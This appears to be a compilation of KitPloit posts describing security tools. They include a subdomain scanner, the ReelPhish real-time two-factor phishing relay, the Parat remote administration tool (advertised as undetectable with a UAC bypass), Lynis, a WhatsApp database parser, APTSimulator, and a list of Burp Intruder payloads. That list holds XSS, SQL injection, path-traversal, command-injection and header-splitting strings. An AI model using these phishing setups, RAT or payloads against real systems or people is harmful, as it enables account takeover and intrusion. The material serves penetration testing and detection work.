Channel: KitPloit - PenTest Tools!

DNSspider - Very Fast, Async Multithreaded Subdomain Scanner


A very fast, multithreaded brute-forcer of subdomains that leverages a wordlist and/or character permutation.
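The core idea (candidates from a wordlist and/or character permutations, resolved concurrently via the concurrent.futures module mentioned in the v0.9 changelog) can be sketched as follows. This is a minimal illustration, not DNSspider's actual code; the wordlist, charset, and function names are invented for the example.

```python
# Minimal sketch of the approach, NOT DNSspider's actual code: candidate
# names come from a wordlist and/or character permutations (generated
# lazily, so the whole list is never materialized up front), and lookups
# run concurrently on a thread pool via concurrent.futures.
import itertools
import socket
from concurrent.futures import ThreadPoolExecutor, as_completed

def candidates(words, charset="abcdefghijklmnopqrstuvwxyz", length=0):
    """Yield wordlist entries, then (optionally) all charset permutations."""
    yield from words
    if length > 0:
        yield from ("".join(p) for p in itertools.product(charset, repeat=length))

def scan(domain, words, threads=8, lookup=socket.gethostbyname):
    """Resolve each candidate subdomain; return the (name, ip) pairs found."""
    found = []
    with ThreadPoolExecutor(max_workers=threads) as pool:
        futures = {pool.submit(lookup, f"{w}.{domain}"): w for w in candidates(words)}
        for fut in as_completed(futures):
            try:
                found.append((f"{futures[fut]}.{domain}", fut.result()))
            except socket.gaierror:
                pass  # candidate did not resolve
    return found
```

Injecting the `lookup` callable keeps the sketch testable without network access; the real tool resolves against live DNS.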

CHANGELOG:

v0.9
  • use async multithreading via concurrent.futures module
  • attack while mutating -> don't generate whole list when using -t 1
  • log only the subdomains to logfile when '-r' was chosen
  • minor code clean-ups / refactoring
  • switch to tabstop=2 / shiftwidth=2

v0.8
  • upgraded to python3

v0.7
  • upgraded built-in wordlist (more than 2k)
  • remove annoying timeout warnings
  • remove color output when logging to file

v0.6
  • upgraded default wordlist
  • replaced optionparser with argparse
  • add version output option
  • fixed typo

v0.5
  • fixed extracted ip addresses from rrset answers
  • renamed file (removed version string)
  • removed trailing whitespaces
  • removed color output
  • changed banner

v0.4
  • fixed a bug for returned list
  • added postfix option
  • upgraded wordlist[]
  • colorised output
  • changed error messages

v0.3:
  • added verbose/quiet mode; default is quiet now
  • fixed try/catch for domainnames
  • fixed some tab width (i normally use <= 80 chars per line)

v0.2:
  • append DNS and IP output to found list
  • added diffound list for subdomains resolved to different addresses
  • get right ip address from current used iface to avoid socket problems
  • fixed socket exception syntax and output
  • added usage note for fixed port and multithreaded socket exception

v0.1:
  • initial release  


ReelPhish - A Real-Time Two-Factor Phishing Tool


ReelPhish simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.

This tool has been released along with a FireEye blog post. The blog post can be found at the following link: https://www.fireeye.com/blog/threat-research/2018/02/reelphish-real-time-two-factor-phishing-tool.html

Installation Steps
  1. The latest release of Python 2.7.x is required.
  2. Install Selenium, a required dependency to run the browser drivers.
    • pip install -r requirements.txt
  3. Download browser drivers for all web browsers you plan to use. Binaries should be placed in this root directory with the following naming scheme.
    • Internet Explorer: www.seleniumhq.org/download/
      • Download the Internet Explorer Driver Server for 32 bit Windows IE. Unzip the file and rename the binary to: IEDriver.exe.
      • In order for the Internet Explorer Driver to work, be sure protected mode is disabled. On IE11 (64 bit Windows), you must create registry key "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BFCACHE". In this key, create a DWORD value named iexplore.exe and set the value to 0.
      • Further information on Internet Explorer requirements can be found on www.github.com/SeleniumHQ/selenium/wiki/InternetExplorerDriver
    • Firefox: www.github.com/mozilla/geckodriver/releases/
      • Download the latest release of the Firefox GeckoDriver for Windows 32 bit. Unzip the file and rename the binary to: FFDriver.exe.
        • On Linux systems, download the Linux version of Firefox GeckoDriver and rename the binary to: FFDriver.bin. Linux support is experimental.
      • Gecko Driver has special requirements. Copy FFDriver.exe to geckodriver.exe and place it into your PATH variable. Additionally, add firefox.exe to your PATH variable.
    • Chrome: https://chromedriver.storage.googleapis.com/index.html?path=2.35/
      • Download the latest release of the Google Chrome Driver for Windows 32 bit. Unzip the file and rename the binary to: ChromeDriver.exe.
        • On Linux systems, download the Linux version of the Chrome Web Driver and rename the binary to: ChromeDriver.bin. Linux support is experimental.

Running ReelPhish
ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from an HTTP POST request and transmit it to the phishing script.
The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received, the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a user's credentials). Credentials will be submitted by the web browser.
The recommended way of handling communication between the phishing site and this script is by using a reverse SSH tunnel. This is why the example PHP phishing site code submits credentials to localhost:2135.
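The receiving side of that pattern can be sketched as follows. This is a hypothetical illustration, not ReelPhish's actual code: a small HTTP listener on the local port (2135 in the example site code) accepts the POSTed credentials; where the real tool would hand them to Selenium, this stub only records them.

```python
# Hypothetical sketch of the listener side, not ReelPhish's actual code:
# an HTTP server on localhost that receives the JSON credentials POSTed
# by the phishing site (via the reverse SSH tunnel). The real tool would
# pass them to Selenium; here we just record them.
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

received = []  # credentials captured so far

class CredHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        creds = json.loads(self.rfile.read(length))
        received.append(creds)  # ReelPhish would drive a browser here
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass

def make_server(port=2135):
    """Bind the listener; port 2135 matches the example PHP site."""
    return HTTPServer(("127.0.0.1", port), CredHandler)
```

On the attacker's system you would run make_server().serve_forever() and expose the port to the phishing host with a reverse tunnel (e.g. ssh -R 2135:127.0.0.1:2135 user@phishingserver).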

ReelPhish Arguments
  1. You must specify the browser you will be using with the --browser parameter. Supported browsers include Internet Explorer ("--browser IE"), Firefox ("--browser FF"), and Chrome ("--browser Chrome"). Windows and Linux are both supported. Chrome requires the least amount of setup steps. See above installation instructions for further details.
  2. You must specify the URL. The script will navigate to this URL and submit credentials on your behalf.
  3. Other optional parameters are available.
    • Set the logging parameter to debug (--logging debug) for verbose event logging
    • Set the submit parameter (--submit) to customize the element that is "clicked" by the browser
    • Set the override parameter (--override) to ignore missing form elements
    • Set the numpages parameter (--numpages) to increase the number of authentication pages (see below section)

Multi Page Authentication Support
ReelPhish supports multiple authentication pages. For example, in some cases a two factor authentication code may be requested on a second page. To implement this feature, be sure that --numpages is set to the number of authentication pages. Also be sure that the session ID is properly tracked on your phishing site. The session ID is used to track users as they proceed through each step of authentication.
In some cases, you may need to scrape specific content (such as a challenge code) off of a particular authentication page. Example commented out code is provided in ReelPhish.py to perform a scraping operation.
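The session-token bookkeeping described above can be sketched like this. The class and field names are invented for illustration; they are not ReelPhish's actual internals.

```python
# Illustrative sketch (invented names, not ReelPhish internals) of the
# session tracking described above: each victim's token maps to the data
# collected so far, advancing one authentication page per submission.
class SessionTracker:
    def __init__(self, numpages=1):
        self.numpages = numpages      # mirrors the --numpages argument
        self.sessions = {}            # token -> list of per-page data

    def submit(self, token, page_data):
        """Record one page of data; return True once all pages are in."""
        pages = self.sessions.setdefault(token, [])
        pages.append(page_data)
        return len(pages) >= self.numpages
```

With numpages=2, the first submission (username/password) returns False and the tracker waits; the second (e.g. a 2FA code) returns True, signalling that the full sequence can be replayed against the legitimate portal.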


Pymap-Scanner - Python Scanner with GUI


Python-based port scanner with a PyQt4 user interface.

Features
  • Basic Gui
  • Speed Scan
  • Custom Services
  • User Control
  • Error Control
  • Useful parameters
  • And More.

Installation Modules
  • PyQt4
  • Nmap

Requirements (Third-Party)
  • xsltproc


Lynis 2.6.2 - Security Auditing Tool for Unix/Linux Systems


We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next in a series of simplification improvements. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. It is used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. Because it runs on the host itself, it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initialization of the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. If, during the Apache scan, it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing so, it collects the discovered certificates so they can be scanned later as well.
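Lynis itself is a shell script, but the opportunistic idea is easy to sketch in Python: probe for what is installed and only queue the matching test groups. The probe mapping below is invented for illustration, not Lynis's own test database.

```python
# Hypothetical Python sketch of opportunistic scanning (Lynis itself is a
# shell script): probe for installed software and only queue the test
# groups that apply. The mapping below is illustrative, not Lynis's own.
import shutil

PROBES = {
    "httpd": "apache-tests",
    "sshd": "ssh-tests",
    "mysqld": "mysql-tests",
}

def plan_tests(which=shutil.which):
    """Return the extra test groups to run, based on what is present."""
    return [group for binary, group in PROBES.items() if which(binary)]
```

Injecting a different `which` callable makes the planner trivial to test without touching the host.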

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as extensions (or add-ons) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests applicable only to a particular standard.

Changelog
Upgrade note
Changes:
--------
* Bugfix for Arch Linux (binary detection)
* Textual changes for several tests
* Update of tests database


Whapa - WhatsApp DataBase Parser Tool


Whapa is a WhatsApp database parser that automates the analysis process. The main purpose of whapa is to present the data held in the SQLite database in a way that is comprehensible to the analyst. The script is written in Python 2.x.
The software is divided into three modes:
  • Message Mode: Analyzes all messages in the database, applying different filters. It extracts thumbnails when they are available.
  • Decryption Mode: Decrypts crypt12 databases, provided you have the key.
  • Info Mode: Displays information about statuses, broadcast lists and groups.
Please note that this project is at an early stage. As such, you may find errors. Use it at your own risk!
Bonus: It also comes with a tool to download the Google Drive backup copies associated with a smartphone.
  • "Whapas.py" is the Spanish version of "whapa.py"

Installation

whapa.py (Whatsapp parser)
You can download the latest version of whapa by cloning the GitHub repository:
git clone https://github.com/B16f00t/whapa.git
then:
pip install -r requirements.txt

whagdext.py (extracts data from a Google Drive account)
sudo apt-get update
sudo apt-get install -y python3-pip
sudo pip3 install pyportify
Then configure settings.cfg:
[auth]
gmail = alias@gmail.com
passw = yourpassword
python3 whagdext.py "arguments"

Usage
---------- Whatsapp Parser v0.2 -----------

usage: whapa.py [-h] [-k KEY | -i | -m] [-t TEXT] [-u USER] [-g GROUP] [-w]
[-s] [-b] [-tS TIME_START] [-tE TIME_END]
[-tT | -tI | -tA | -tV | -tC | -tL | -tX | -tP | -tG | -tD | -tR]
[DATABASE]

To start choose a database and a mode with options

positional arguments:
DATABASE database file path - './msgstore.db' by default

optional arguments:
-h, --help show this help message and exit
-k KEY, --key KEY *** Decrypt Mode *** - key file path
-i, --info *** Info Mode ***
-m, --messages *** Message Mode ***
-t TEXT, --text TEXT filter messages by text match
-u USER, --user USER filter messages made by a phone number
-g GROUP, --group GROUP
filter messages made in a group number
-w, --web filter messages made by Whatsapp Web
-s, --starred filter messages starred by user
-b, --broadcast filter messages send by broadcast
-tS TIME_START, --time_start TIME_START
filter messages by start time (dd-mm-yyyy HH:MM)
-tE TIME_END, --time_end TIME_END
filter messages by end time (dd-mm-yyyy HH:MM)
-tT, --type_text filter text messages
-tI, --type_image filter image messages
-tA, --type_audio filter audio messages
-tV, --type_video filter video messages
-tC, --type_contact filter contact messages
-tL, --type_location filter location messages
-tX, --type_call filter audio/video call messages
-tP, --type_application
filter application messages
-tG, --type_gif filter GIF messages
-tD, --type_deleted filter deleted object messages
-tR, --type_share filter Real time location messages

Examples
("./Media" is the directory where thumbnails are written)
  • Message mode:
      python whapa.py -m 
    Show all messages from the database.
      python whapa.py -m -tS "12-12-2017 12:00" -tE "13-12-2017 12:00"
    Show all messages from 12-12-2017 12:00 to 13-12-2017 12:00.
      python whapa.py -m -w -tI
    Show all images sent by WhatsApp Web.
  • Decrypt mode:
      python whapa.py msgstore.db.crypt12 -k key
    Decrypts msgstore.db.crypt12, creating msgstore.db.
  • Info mode:
      python whapa.py -i
    Shows information about groups, broadcast lists and statuses.
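The message-mode filtering above can be sketched with plain sqlite3. Note the schema here (a messages table with sender, timestamp and body columns) is a simplified stand-in; the real msgstore.db layout differs, and whapa handles many more fields and message types.

```python
# Sketch of message-mode filtering over a *simplified* stand-in schema;
# the real msgstore.db layout differs and whapa handles many more fields.
import sqlite3

def query_messages(db_path, text=None, start_ts=None, end_ts=None):
    """Return (sender, timestamp, body) rows matching the optional filters."""
    sql = "SELECT sender, timestamp, body FROM messages WHERE 1=1"
    args = []
    if text is not None:              # like whapa's -t text filter
        sql += " AND body LIKE ?"
        args.append(f"%{text}%")
    if start_ts is not None:          # like -tS
        sql += " AND timestamp >= ?"
        args.append(start_ts)
    if end_ts is not None:            # like -tE
        sql += " AND timestamp <= ?"
        args.append(end_ts)
    with sqlite3.connect(db_path) as con:
        return con.execute(sql, args).fetchall()
```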


Parat - Python Based Remote Administration Tool (RAT)


Parat is a simple remote administration tool (RAT) written in python.
You can also read the wiki!

Change log:
  • Compatible with both Python 2 and 3 (note that this may still cause some errors, so please report any error(s) you find)

Do you want to try?
Copy and paste on your terminal:
git clone https://github.com/micle-fm/Parat && cd Parat && python main.py
Note: on some targets you may need to install pypiwin32 first: python -m easy_install pypiwin32

Features
  • Fully UnDetectable (FUD)
  • Compatible with the Telegram messenger
  • Bypasses Windows User Account Control (UAC)
  • In-memory execution
  • No requirements to set up

Telegram
You can communicate with Parat using the Telegram messenger. To do so, follow these steps:
  1. Open telegram.service file by an editor
  2. Insert your bot token on line 15, replacing YOUR_BOT_TOKEN
  3. Run telegram.service by typing: python telegram.service
  4. Now you can use your bot to control Parat :)
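For context, the bot token plugs into the Telegram Bot API, which exposes methods at https://api.telegram.org/bot<token>/<method>. A minimal polling loop (a hypothetical sketch, not Parat's actual telegram.service code) looks like:

```python
# Hypothetical sketch, not Parat's telegram.service code: the bot token
# is used to build Telegram Bot API URLs, and pending commands sent to
# the bot are fetched by polling the getUpdates method.
import json
import urllib.request

def api_url(token, method):
    """Telegram Bot API endpoint for a given bot token and method."""
    return f"https://api.telegram.org/bot{token}/{method}"

def poll_commands(token, offset=0):
    """Fetch messages sent to the bot (performs a network call)."""
    url = api_url(token, "getUpdates") + f"?offset={offset}"
    with urllib.request.urlopen(url) as resp:
        return json.load(resp).get("result", [])
```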

APTSimulator - A toolset to make a system look as if it was the victim of an APT attack


APT Simulator is a Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised.

Use Cases
  1. POCs: Endpoint detection agents / compromise assessment tools
  2. Test your security monitoring's detection capabilities
  3. Test your SOC's response to a threat that isn't EICAR or a port scan
  4. Prepare an environment for digital forensics classes

Motives
Customers tested our scanners in a POC and complained that our scanners didn't report on the programs they had installed on their test systems. They had installed Nmap, dropped a PsExec.exe in the Downloads folder, and placed an EICAR test file on the user's Desktop. That was the moment I decided to build a tool that simulates a real threat in a more appropriate way.

Why Batch?
  • Because it's simple: Everyone can read, modify or extend it
  • It runs on every Windows system without any prerequisites
  • It is closest to a real attacker working on the command line

Focus
The focus of this tool is to simulate adversary activity, not malware.


Getting Started
  1. Download the latest release from the "release" section
  2. Extract the package on a demo system (Password: apt)
  3. Start a cmd.exe as Administrator
  4. Navigate to the extracted program folder and run APTSimulator.bat

Avoiding Early Detection
The batch script extracts the tools and shells from an encrypted 7z archive at runtime. Do not download the master repo using the "download as ZIP" button. Instead use the official release from the release section.

Extending the Test Set
Since version 0.4 it is pretty easy to extend the test sets by adding a single .bat file to one of the test-set category folders.
E.g., if you want to write a simple use case for "privilege escalation" that uses a tool named "privesc.exe", clone the repo and do the following:
  1. Add your tool to the toolset folder
  2. Write a new batch script privesc-1.bat and add it to the ./test-sets/privilege-escalation folder
  3. Run build_pack.bat
  4. Add your test to the table and action list in the README.md
  5. Create a pull request

Tool and File Extraction
If your script includes a tool, web shell, auxiliary or output file, place them in the folders ./toolset or ./workfiles. Running the build script build_pack.bat will include them in the encrypted archives enc-toolset.7z and enc-files.7z.

Extract a Tool
%ZIP% e -p%PASS% %TOOLARCH% -aoa -o%APTDIR% toolset\tool.exe > NUL

Extract a File
%ZIP% e -p%PASS% %FILEARCH% -aoa -o%APTDIR% workfile\tool-output.txt > NUL

Detection
The following table shows the different test cases and the expected detection results.
  • AV = Antivirus
  • NIDS = Network Intrusion Detection System
  • EDR = Endpoint Detection and Response
  • SM = Security Monitoring
  • CA = Compromise Assessment
Test Case: expected detections (see legend above; (X) = partial detection)
  • Dumps (Pwdump, Dir Listing): X
  • Recon Activity (Typical Commands): X X X
  • DNS (Cache Injection): (X) X X X
  • Eventlog (WCE entries): X X X
  • Hosts File (AV/Win Update blocks): (X) X X
  • Backdoor (StickyKey file/debugger): X X
  • Obfuscation (RAR with JPG ext): (X)
  • Web Shells (a good selection): X (X) X
  • Ncat Alternative (Drop & Exec): X X X X
  • Remote Execution Tool (Drop): (X) X
  • Mimikatz (Drop & Exec): X X X X
  • PsExec (Drop & Exec): X X X
  • At Job Creation: X X X
  • RUN Key Entry Creation: X X X
  • System File in Susp Loc (Drop & Exec): X X X
  • Guest User (Activation & Admin): X X X
  • LSASS Dump (with Procdump): X X X
  • C2 Requests: (X) X X X
  • Malicious User Agent (Malware, RATs): X X X
  • Scheduled Task Creation: X X X
  • Nbtscan Discovery (Scan & Output): X X (X) X

Test Cases

1. Dumps
  • drops pwdump output to the working dir
  • drops directory listing to the working dir

2. Recon
  • Executes commands used by attackers to get information about a target system

3. DNS
  • Looks up several well-known C2 addresses to cause DNS requests and get the addresses into the local DNS cache

4. Eventlog
  • Creates Windows Eventlog entries that look as if WCE had been executed

5. Hosts
  • Adds entries to the local hosts file (update blocker, entries caused by malware)

6. Sticky Key Backdoor
  • Tries to replace sethc.exe with cmd.exe (a backup file is created)
  • Tries to register cmd.exe as debugger for sethc.exe

7. Obfuscation
  • Drops a cloaked RAR file with JPG extension

8. Web Shells
  • Creates a standard web root directory
  • Drops standard web shells to that directory
  • Drops a GIF-obfuscated web shell to that directory

9. Ncat Alternative
  • Drops a PowerShell Ncat alternative to the working directory

10. Remote Execution Tool
  • Drops a remote execution tool to the working directory

11. Mimikatz
  • Dumps mimikatz output to the working directory (fallback if other executions fail)
  • Runs a special version of mimikatz and dumps the output to the working directory
  • Runs Invoke-Mimikatz in memory (GitHub download, reflection)

12. PsExec
  • Drops a renamed version of PsExec to the working directory
  • Run PsExec to start a command line in LOCAL_SYSTEM context

13. At Job
  • Creates an at job that runs mimikatz and dumps credentials to file

14. RUN Key
  • Create a suspicious new RUN key entry that dumps "net user" output to a file

15. System File Suspicious Location
  • Drops suspicious executable with system file name (svchost.exe) in %PUBLIC% folder
  • Runs that suspicious program in %PUBLIC% folder

16. Guest User
  • Activates Guest user
  • Adds Guest user to the local administrators

17. LSASS DUMP
  • Dumps LSASS process memory to a suspicious folder

18. C2 Requests
  • Uses Curl to access well-known C2 servers

19. Malicious User Agents
  • Uses malicious user agents to access web sites

20. Scheduled Task Creation
  • Creates a scheduled task that runs mimikatz and dumps the output to a file

21. Nbtscan Discovery
  • Scans 3 private class-C subnets and dumps the output to the working directory

Warning
This repo contains tools and executables that can harm your system's integrity and stability. Only use them on non-production test or demo systems.


Advanced Solutions
The CALDERA automated adversary emulation system https://github.com/mitre/caldera
Infection Monkey - An automated pentest tool https://github.com/guardicore/monkey
Flightsim - A utility to generate malicious network traffic and evaluate controls https://github.com/alphasoc/flightsim


IntruderPayloads - A Collection Of Burpsuite Intruder Payloads, Fuzz Lists And File Uploads


A collection of Burpsuite Intruder payloads, fuzz lists, and pentesting methodology. To pull down all third-party repos, run install.sh in the same directory as the IntruderPayloads folder.

Author: 1N3@CrowdShield https://crowdshield.com

PENTEST METHODOLOGY v2.0

BASIC PASSIVE AND ACTIVE CHECKS:
  • Burpsuite Spider with intelligent form submission
  • Manual crawl of website through Burpsuite proxy and submitting INJECTX payloads for tracking
  • Burpsuite passive scan
  • Burpsuite engagement tools > Search > <form|<input|url=|path=|load=|INJECTX|Found|<!--|Exception|Query|ORA|SQL|error|Location|crowdshield|xerosecurity|username|password|document\.|location\.|eval\(|exec\(|\?wsdl|\.wsdl
  • Burpsuite engagement tools > Find comments
  • Burpsuite engagement tools > Find scripts
  • Burpsuite engagement tools > Find references
  • Burpsuite engagement tools > Analyze target
  • Burpsuite engagement tools > Discover content
  • Burpsuite Intruder > file/directory brute force
  • Burpsuite Intruder > HTTP methods, user agents, etc.
  • Enumerate all software technologies, HTTP methods, and potential attack vectors
  • Understand the function of the site: what types of data are stored or valuable, what sorts of functions to attack, etc.

ENUMERATION:
  • OPERATING SYSTEM
  • WEB SERVER
  • DATABASE SERVERS
  • PROGRAMMING LANGUAGES
  • PLUGINS/VERSIONS
  • OPEN PORTS
  • USERNAMES
  • SERVICES
  • WEB SPIDERING
  • GOOGLE HACKING

VECTORS:
  • INPUT FORMS
  • GET/POST PARAMS
  • URI/REST STRUCTURE
  • COOKIES
  • HEADERS

SEARCH STRINGS:
Just some helpful regex terms to search for passively using Burpsuite or any other web proxy...
fname|phone|id|org_name|name|email
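The same terms can be grepped outside a proxy as well, e.g. over saved response bodies; a small sketch:

```python
# Applying the passive search terms above to a saved response body with
# Python's re module instead of a web proxy.
import re

TERMS = re.compile(r"fname|phone|id|org_name|name|email", re.IGNORECASE)

def interesting(body):
    """Return the unique search-term hits found in a response body."""
    return sorted({m.group(0).lower() for m in TERMS.finditer(body)})
```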

QUICK ATTACK STRINGS:
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...
Company
First Last
username
username@mailinator.com
Password123$
+1416312384
google.com
https://google.com
//google.com
.google.com
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt.png
https://google.com/.injectx/rfi_vuln.txt.html
12188
01/01/1979
4242424242424242
INJECTX
'>"></INJECTX>(1)
javascript:alert(1)//
"><img/onload=alert(1)>' --
"></textarea><img/onload=alert(1)>' --
INJECTX'>"><img/src="https://google.com/.injectx/xss_vuln.png"></img>
'>"><iframe/onload=alert(1)></iframe>
INJECTX'>"><ScRiPt>confirm(1)<ScRiPt>
"></textarea><img/onload=alert(1)>' -- // INJECTX <!--
"><img/onload=alert(1)>' -- // INJECTX <!--
INJECTX'"><h1>X<!--
INJECTX"><h1>X
en%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
%0AContent-Length%3A%200%0A%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20text%2Fhtml%0AContent-Length%3A%2020%0A%3Chtml%3EINJECTX%3C%2Fhtml%3E%0A%0A
../../../../../../../../../../../etc/passwd
{{4+4}}
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
admin" or "1"="1"--
admin' or '1'='1'--
firstlastcompany%0a%0d

OWASP TESTING CHECKLIST:
  • Spiders, Robots and Crawlers IG-001
  • Search Engine Discovery/Reconnaissance IG-002
  • Identify application entry points IG-003
  • Testing for Web Application Fingerprint IG-004
  • Application Discovery IG-005
  • Analysis of Error Codes IG-006
  • SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
  • DB Listener Testing - DB Listener weak CM‐002
  • Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
  • Application Configuration Management Testing - Application Configuration management weakness CM‐004
  • Testing for File Extensions Handling - File extensions handling CM‐005
  • Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
  • Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
  • Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
  • Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
  • Testing for user enumeration - User enumeration AT-002
  • Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
  • Brute Force Testing - Credentials Brute forcing AT-004
  • Testing for bypassing authentication schema - Bypassing authentication schema AT-005
  • Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
  • Testing for Logout and Browser Cache Management - Logout function not properly implemented, browser cache weakness AT-007
  • Testing for CAPTCHA - Weak Captcha implementation AT-008
  • Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
  • Testing for Race Conditions - Race Conditions vulnerability AT-010
  • Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
  • Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002
  • Testing for Session Fixation - Session Fixation SM-003
  • Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
  • Testing for CSRF - CSRF SM-005
  • Testing for Path Traversal - Path Traversal AZ-001
  • Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
  • Testing for Privilege Escalation - Privilege Escalation AZ-003
  • Testing for Business Logic - Bypassable business logic BL-001
  • Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
  • Testing for Stored Cross Site Scripting - Stored XSS DV-002
  • Testing for DOM based Cross Site Scripting - DOM XSS DV-003
  • Testing for Cross Site Flashing - Cross Site Flashing DV-004
  • SQL Injection - SQL Injection DV-005
  • LDAP Injection - LDAP Injection DV-006
  • ORM Injection - ORM Injection DV-007
  • XML Injection - XML Injection DV-008
  • SSI Injection - SSI Injection DV-009
  • XPath Injection - XPath Injection DV-010
  • IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
  • Code Injection - Code Injection DV-012
  • OS Commanding - OS Commanding DV-013
  • Buffer overflow - Buffer overflow DV-014
  • Incubated vulnerability - Incubated vulnerability DV-015
  • Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
  • Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
  • Locking Customer Accounts - Locking Customer Accounts DS-002
  • Testing for DoS Buffer Overflows - Buffer Overflows DS-003
  • User Specified Object Allocation - User Specified Object Allocation DS-004
  • User Input as a Loop Counter - User Input as a Loop Counter DS-005
  • Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
  • Failure to Release Resources - Failure to Release Resources DS-007
  • Storing too Much Data in Session - Storing too Much Data in Session DS-008
  • WS Information Gathering - N.A. WS-001
  • Testing WSDL - WSDL Weakness WS-002
  • XML Structural Testing - Weak XML Structure WS-003
  • XML content-level Testing - XML content-level WS-004
  • HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-005
  • Naughty SOAP attachments - WS Naughty SOAP attachments WS-006
  • Replay Testing - WS Replay Testing WS-007
  • AJAX Vulnerabilities - N.A. AJ-001
  • AJAX Testing - AJAX weakness AJ-002

LOW SEVERITY:
A list of low severity findings that are likely out of scope for most bug bounty programs but still helpful to reference for normal web penetration tests.
  • Descriptive error messages (e.g. Stack Traces, application or server errors).
  • HTTP 404 codes/pages or other HTTP non-200 codes/pages.
  • Banner disclosure on common/public services.
  • Disclosure of known public files or directories, (e.g. robots.txt).
  • Click-Jacking and issues only exploitable through click-jacking.
  • CSRF on forms which are available to anonymous users (e.g. the contact form).
  • Logout Cross-Site Request Forgery (logout CSRF).
  • Presence of application or web browser ‘autocomplete’ or ‘save password’ functionality.
  • Lack of Secure and HTTPOnly cookie flags.
  • Lack of Security Speedbump when leaving the site.
  • Weak Captcha / Captcha Bypass
  • Username enumeration via Login Page error message
  • Username enumeration via Forgot Password error message
  • Login or Forgot Password page brute force and account lockout not enforced.
  • OPTIONS / TRACE HTTP method enabled
  • SSL Attacks such as BEAST, BREACH, Renegotiation attack
  • SSL Forward secrecy not enabled
  • SSL Insecure cipher suites
  • The Anti-MIME-Sniffing header X-Content-Type-Options
